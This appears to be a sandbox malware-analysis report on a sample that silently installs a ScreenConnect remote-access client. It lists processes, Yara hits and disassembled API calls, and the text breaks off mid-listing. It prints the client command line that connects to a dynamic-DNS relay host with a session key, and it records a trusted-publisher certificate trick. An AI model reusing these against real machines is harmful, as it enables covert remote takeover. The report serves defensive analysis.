MD5 hash:	10777132FC1E95538ACBE0728E10939D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:19:57
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Imagebase:	0x15ffd900000
File size:	24'856 bytes
MD5 hash:	B4088F44B80D363902E11F897A7BAC09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2999833132.0000015F80352000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:19:59
Start date:	30/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:19:59
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3540 -ip 3540
Imagebase:	0x9d0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:19:59
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 724
Imagebase:	0x9d0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:19:59
Start date:	30/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	08:20:22
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe"
Imagebase:	0xc90000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:20:23
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Imagebase:	0xb10000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:20:24
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Imagebase:	0xb10000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	08:20:24
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe" "RunRole" "5907bb67-d556-434c-b64e-e4ceba678cb8" "User"
Imagebase:	0x740000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	08:20:41
Start date:	30/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	1463
Total number of Limit Nodes:	4

Executed Functions

Function 00021000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199
encryptionmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000000,00000104), ref: 00021016
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00021025
CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00021032
LocalAlloc.KERNELBASE(00000000,00040000), ref: 00021057
LocalAlloc.KERNEL32(00000000,00040000), ref: 00021063
CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00021082
CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 000210B2
LocalAlloc.KERNEL32(00000000,?), ref: 000210C5
LocalAlloc.KERNEL32(00000000,00002000), ref: 000210F4
CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0002110A
CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0002111A
CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0002112D
CertFreeCertificateContext.CRYPT32(00000000), ref: 00021134
LocalFree.KERNEL32(00000000), ref: 0002113E
LocalFree.KERNEL32(00000000), ref: 0002115D
CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0002116E
CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00021182
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00021198
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 000211A9
LoadLibraryA.KERNELBASE(dfshim), ref: 000211BA
GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 000211C6
Sleep.KERNELBASE(00009C40), ref: 000211E8
CertDeleteCertificateFromStore.CRYPT32(?), ref: 0002120B
CertCloseStore.CRYPT32(?,00000000), ref: 0002121A
LocalFree.KERNEL32(?), ref: 00021223
LocalFree.KERNEL32(?), ref: 00021228
LocalFree.KERNEL32(?), ref: 0002122D

Strings

dfshim, xrefs: 000211B5
1.3.6.1.4.1.311.4.1.1, xrefs: 00021193, 000211A4
ShOpenVerbApplicationW, xrefs: 000211C0
TrustedPublisher, xrefs: 0002102B

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
API String ID: 335784236-860318880
Opcode ID: 697c82b5139598e16fc9059b48b63bb9df4299fc9bfe974fdaf347f068b26ac1
Instruction ID: bfd1e8b74410cc8a7d90f165bf31fb8b12a4099e7ef7b91931924a99ef63f10d
Opcode Fuzzy Hash: 697c82b5139598e16fc9059b48b63bb9df4299fc9bfe974fdaf347f068b26ac1
Instruction Fuzzy Hash: E4616E71A40219BFEB219B94DC89FAFBBB9EF48B50F140054FA14B7290C775A901CBA4

Non-executed Functions

Function 0002191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0002192B
IsDebuggerPresent.KERNEL32 ref: 000219F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00021A10
UnhandledExceptionFilter.KERNEL32(?), ref: 00021A1A

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0caf12b67aa21988f54522c1df2718b44ba9740f56238eb37f7496c40a3ddf48
Instruction ID: 91523420f5e2dff76778254ba5f96306d2f7d6370e873fd82142288a44423250
Opcode Fuzzy Hash: 0caf12b67aa21988f54522c1df2718b44ba9740f56238eb37f7496c40a3ddf48
Instruction Fuzzy Hash: 78310875D012289BDF21DFA4D989BCDBBB8BF18300F1041EAE50CAB251EB759A85CF45

Function 00024573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0002466B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00024675
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00024682

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8957eb460c1975fe783c63897cef036ba9748afd2bbf12ec0d7c10ac8ca57cbe
Instruction ID: 784f6d078f00ed8f553a00d63ab458f04010efe5112e7caa58541dac55831105
Opcode Fuzzy Hash: 8957eb460c1975fe783c63897cef036ba9748afd2bbf12ec0d7c10ac8ca57cbe
Instruction Fuzzy Hash: 6531C474901228ABCB61DF64ED89BCDBBB8BF18310F5041EAE41CA7251EB749F858F45

Function 00023677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0002364D,?,000302E0,0000000C,000237A4,?,00000002,00000000,?,00023F66,00000003,0002209F,00021AFC), ref: 00023698
TerminateProcess.KERNEL32(00000000,?,0002364D,?,000302E0,0000000C,000237A4,?,00000002,00000000,?,00023F66,00000003,0002209F,00021AFC), ref: 0002369F
ExitProcess.KERNEL32 ref: 000236B1

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5bfb5103029f1b027727baf20df4233f301a56af4773f2496466a1afe63f246e
Instruction ID: be307d332d027c145077addf86eb509b0704fd8e59055ba54a8245e2c97cb393
Opcode Fuzzy Hash: 5bfb5103029f1b027727baf20df4233f301a56af4773f2496466a1afe63f246e
Instruction Fuzzy Hash: E8E04631000518AFDF22AF54ED4DA8A3B69FF40341B108014FA099A232DB3DDE42CB50

Function 00024A4B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00024BDE

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 8963d6e4987dea503c9ce1212473611e09c2cd6b145283ee06972f6ddb83eb89
Instruction ID: 73c37507f52856d059761aef954b88ee14252bbae622001f24b12d7d409f7f49
Opcode Fuzzy Hash: 8963d6e4987dea503c9ce1212473611e09c2cd6b145283ee06972f6ddb83eb89
Instruction Fuzzy Hash: 0A310272800229ABCB65CE78EC84EFB7BBDEB86304F0041A8F91997252E6709D448B50

Function 0002A495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0002A490,?,?,00000008,?,?,0002A130,00000000), ref: 0002A6C2

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5b8ace16eb594c9a61094737b8ad64d72d4fbe21fa54ad928494b3e5abff34c3
Instruction ID: 130b1302ac7b631f596e978342e3388381e6648a733e4de6a089ad3958cf2537
Opcode Fuzzy Hash: 5b8ace16eb594c9a61094737b8ad64d72d4fbe21fa54ad928494b3e5abff34c3
Instruction Fuzzy Hash: 56B18031210618CFD755CF28D48AB657BF0FF46364F298658E89ACF2A1C735D992CB41

Function 00021BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00021BEA

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 0b5e3a9587402a88730d60c8744fceb894e156b8c8fec41a2aba3206294eb442
Instruction ID: b056cbe215f91a480cb3844eaaa50873593e2f35da0b3b480e609897ff2a6d92
Opcode Fuzzy Hash: 0b5e3a9587402a88730d60c8744fceb894e156b8c8fec41a2aba3206294eb442
Instruction Fuzzy Hash: 71519AB5E10225CBEB6ACF64E9917EEBBF4FB58300F24842AC401EB290D3789941CF50

Function 00021AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00021300), ref: 00021AB1

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a5d09bd75d17d7cd75a3cb7b3f649cfcc7e9e6d481c899cb2f898637a66c3092
Instruction ID: 1917220d77e9749bcdf2df8e34d6ce053a25100fbee3fc00c8427c9d9ae91786
Opcode Fuzzy Hash: a5d09bd75d17d7cd75a3cb7b3f649cfcc7e9e6d481c899cb2f898637a66c3092
Instruction Fuzzy Hash:

Function 00026893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00026893

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 25e4acad2daa9ee648b711aaef28a00f9354fbe0a5f6cb1f27e09ff07aaab021
Instruction ID: fedfcc7473995d7e321d7bbc3be4eb7c51228a7339615e40354866210fb0f62d
Opcode Fuzzy Hash: 25e4acad2daa9ee648b711aaef28a00f9354fbe0a5f6cb1f27e09ff07aaab021
Instruction Fuzzy Hash: 95A012302001018B63108F346B46308369C570068071500145108C0020D72840505A01

Function 00026507 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 0002654B

Part of subcall function 00026078: _free.LIBCMT ref: 00026095
Part of subcall function 00026078: _free.LIBCMT ref: 000260A7
Part of subcall function 00026078: _free.LIBCMT ref: 000260B9
Part of subcall function 00026078: _free.LIBCMT ref: 000260CB
Part of subcall function 00026078: _free.LIBCMT ref: 000260DD
Part of subcall function 00026078: _free.LIBCMT ref: 000260EF
Part of subcall function 00026078: _free.LIBCMT ref: 00026101
Part of subcall function 00026078: _free.LIBCMT ref: 00026113
Part of subcall function 00026078: _free.LIBCMT ref: 00026125
Part of subcall function 00026078: _free.LIBCMT ref: 00026137
Part of subcall function 00026078: _free.LIBCMT ref: 00026149
Part of subcall function 00026078: _free.LIBCMT ref: 0002615B
Part of subcall function 00026078: _free.LIBCMT ref: 0002616D

_free.LIBCMT ref: 00026540

Part of subcall function 00024869: HeapFree.KERNEL32(00000000,00000000,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?), ref: 0002487F
Part of subcall function 00024869: GetLastError.KERNEL32(?,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?,?), ref: 00024891

_free.LIBCMT ref: 00026562
_free.LIBCMT ref: 00026577
_free.LIBCMT ref: 00026582
_free.LIBCMT ref: 000265A4
_free.LIBCMT ref: 000265B7
_free.LIBCMT ref: 000265C5
_free.LIBCMT ref: 000265D0
_free.LIBCMT ref: 00026608
_free.LIBCMT ref: 0002660F
_free.LIBCMT ref: 0002662C
_free.LIBCMT ref: 00026644

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ccb980c8bcb9d0bd3cb32ada5412373e5668112d736d6dc988b692b36a7dfe90
Instruction ID: d23a1ba31643884a81596d64b995d4fa38c33a406aebf17b68ab67c4b8aa9fb3
Opcode Fuzzy Hash: ccb980c8bcb9d0bd3cb32ada5412373e5668112d736d6dc988b692b36a7dfe90
Instruction Fuzzy Hash: E1316F716007209FEBA5AA7AF849B9AB3E8EF40710F154469F049D7192DF36ED90CB50

Function 00024330 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00024344

Part of subcall function 00024869: HeapFree.KERNEL32(00000000,00000000,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?), ref: 0002487F
Part of subcall function 00024869: GetLastError.KERNEL32(?,?,0002620D,?,00000000,?,00000000,?,00026234,?,00000007,?,?,0002669F,?,?), ref: 00024891

_free.LIBCMT ref: 00024350
_free.LIBCMT ref: 0002435B
_free.LIBCMT ref: 00024366
_free.LIBCMT ref: 00024371
_free.LIBCMT ref: 0002437C
_free.LIBCMT ref: 00024387
_free.LIBCMT ref: 00024392
_free.LIBCMT ref: 0002439D
_free.LIBCMT ref: 000243AB

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182632878.0000000000033000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_20000_mrKs8EKXbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3e962f166fba4120ac8eda37407814e07a8443d2d05fbd685cb0a18f68c289b6
Instruction ID: 03092ee124f2dbc2eea2f107f97a2362d2aa284e4a60b3a5bf7160f63214f0e6
Opcode Fuzzy Hash: 3e962f166fba4120ac8eda37407814e07a8443d2d05fbd685cb0a18f68c289b6
Instruction Fuzzy Hash: FA118676610158FFCB45EF96E842CDD3BA9EF44750F5241A6FA088F263DA31DE509B80

Function 00027AB4 Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,000254C8,00000000,?,?,?,00027D05,?,?,00000100), ref: 00027B0E
__alloca_probe_16.LIBCMT ref: 00027B46
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00027D05,?,?,00000100,5EFC4D8B,?,?), ref: 00027B94
__alloca_probe_16.LIBCMT ref: 00027C2B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00027C8E
__freea.LIBCMT ref: 00027C9B

Part of subcall function 000262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00027E5B,?,00000000,?,0002686F,?,00000004,00000000,?,?,?,00023BCD), ref: 00026331

__freea.LIBCMT ref: 00027CA4
__freea.LIBCMT ref: 00027CC9

Memory Dump Source

Source File: 00000001.00000002.2182584520.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000001.00000002.2182567984.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182599531.000000000002B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2182616424.0000000000031000.00000004.00000001.01000000.00000003.sdmpDownload File
